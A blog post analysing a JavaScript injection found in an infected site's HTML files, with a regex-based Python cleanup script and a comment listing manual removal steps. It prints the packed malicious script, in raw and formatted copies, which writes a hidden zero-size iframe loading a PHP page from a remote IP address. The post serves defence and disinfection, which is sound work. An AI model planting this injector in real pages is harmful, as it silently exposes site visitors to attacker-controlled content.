Malware – tag5479347351

Today I found some JavaScript code that contains a tag5479347351 HTML tag.
The site was blocked by Avast, and the malicious code breaks the HTML so that the site falls to pieces. The owner ran Sucuri/Wordfence/Anti Malware and cleaned it a couple of times, but the issue keeps coming back.
After looking for the problem in the HTML files, I found this code:

<tag5479347351></tag5479347351><script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|98||src|height|199|width|board||11|php|254|tag1|ram'.split('|'),0,{}))</script><tag5479347352></tag5479347352>

The code looks like this after formatting:

<tag5479347351>
</tag5479347351>
<script>
    eval(function(p, a, c, k, e, d) {
        e = function(c) {
            return c.toString(36)
        };
        if (!''.replace(/^/, String)) {
            while (c--) {
                d[c.toString(a)] = k[c] || c.toString(a)
            }
            k = [function(e) {
                return d[e]
            }];
            e = function() {
                return '\\w+'
            };
            c = 1
        };
        while (c--) {
            if (k[c]) {
                p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
            }
        }
        return p
    }('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);', 26, 26, '|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|98||src|height|199|width|board||11|php|254|tag1|ram'.split('|'), 0, {}))
</script>
<tag5479347352>
</tag5479347352>

All HTML files are infected by this, so we need to open every HTML file that contains the malicious code and remove it.
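
One way to automate that removal on a downloaded copy of the site, as an added example (not code from the original post). It assumes every injection has the shape shown above: an empty tagN marker, a script starting with eval(function(p,a,c,k,e,d), then a second empty marker. The names clean_tree, INJECTED and RESIDUE are made up for this example.

```python
import re
import shutil
from pathlib import Path

# Shape of the injection shown on this page: an empty <tagN></tagN> marker, a
# <script> holding eval(function(p,a,c,k,e,d){...}), then an empty <tagM></tagM>.
# Bytes patterns leave each file's original encoding untouched.
INJECTED = re.compile(
    rb"<(tag\d+)>\s*</\1>\s*"
    rb"<script[^>]*>\s*eval\(function\(p,\s*a,\s*c,\s*k,\s*e,\s*d\)"
    rb"(?:(?!</script>).)*</script>\s*"  # never run past this script's end
    rb"<(tag\d+)>\s*</\2>",
    re.DOTALL | re.IGNORECASE,
)
# Anything that still looks like a marker or a packer stub after cleaning.
RESIDUE = re.compile(
    rb"<tag\d+>|eval\(function\(p,\s*a,\s*c,\s*k,\s*e,\s*d\)", re.IGNORECASE
)


def clean_tree(root, backup_dir, suffixes=(".html", ".htm")):
    """Strip injected blocks under root.

    Returns {relative path: (blocks_removed, needs_manual_review)} for every
    file that was changed or still contains something suspicious.
    """
    root, backup_dir = Path(root), Path(backup_dir)
    report = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in suffixes:
            continue
        cleaned, removed = INJECTED.subn(b"", path.read_bytes())
        needs_review = bool(RESIDUE.search(cleaned))
        rel = path.relative_to(root)
        if removed:
            # Keep the infected original, outside the web root, for analysis.
            saved = backup_dir / rel
            saved.parent.mkdir(parents=True, exist_ok=True)
            shutil.copy2(path, saved)
            path.write_bytes(cleaned)
        if removed or needs_review:
            report[rel.as_posix()] = (removed, needs_review)
    return report


if __name__ == "__main__":
    import sys
    for name, (removed, review) in clean_tree(sys.argv[1], sys.argv[2]).items():
        print(f"{name}: removed={removed} manual_review={review}")
```

A packed script without the surrounding markers is reported for manual review rather than deleted, because legitimate pages can use the same packer.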

2 thoughts on “Malware – tag5479347351”

  1. Of course. 🙂

    The solution was:
    – download all files to my computer with FTP
    – in Total Commander, search for tag5479347351 within all files
    – open them in a text editor
    – replace the virus code with an empty string
    – upload the disinfected files

    And of course you need to update your WordPress and plugins, and it is recommended to review the PHP files for different malicious code.
